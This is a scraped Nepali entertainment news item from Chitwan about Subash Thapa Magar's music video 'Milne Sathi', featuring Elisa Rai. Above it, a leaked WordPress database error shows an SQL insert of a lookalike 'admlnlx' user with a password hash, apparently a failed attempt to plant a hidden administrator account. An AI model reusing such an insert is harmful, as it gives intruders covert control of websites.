WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Br5VkADKSDopStZnyZUXn0Pta5CFpD1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 21:38:26', '', 'admlnlx', 'admlnlx')
चितवन, माघ २५–
चितवनका सुवास थापाले एकदमै मिल्ने साथी भेटाएका छन् । चलचित्र लुट २ को ठमेल बजार गीतबाट चर्चामा आएकी एलिसा राइलार्इ सुवासले मिल्ने साथी बनाएका छन् । सुवासले ‘मिल्ने साथी’ बोलको गीत बजारमा ल्याएपछि एलिशा साथी बनेकी छिन् । सुबास थापा मगरको आवाजमा रहेको गीतको भिडियोमा एलिशालाई फिचरिङ गरिएको छ । यस गीतमा दिपक राज विश्वकर्माको रचना रसंगीत रहेको छ । भिडियोमा एलिशासंगै मोडल भुवन कार्कीको अभिनय रहेको छ। अहिलेका व्यस्त छायाँकार ज्ञानेन्द्र शर्माले खिचेको भिडियोलार्इ पुराना तथा अनुभबी व्यक्ति प्रज्वलित पराजुलीले सम्पादन गरेका हुन्। सन्तोष राजबाहकले निर्देशन गरेको भिडियोमा एक प्रेम जोडीको प्रेमलार्इ दर्साउन खोजिएको छ।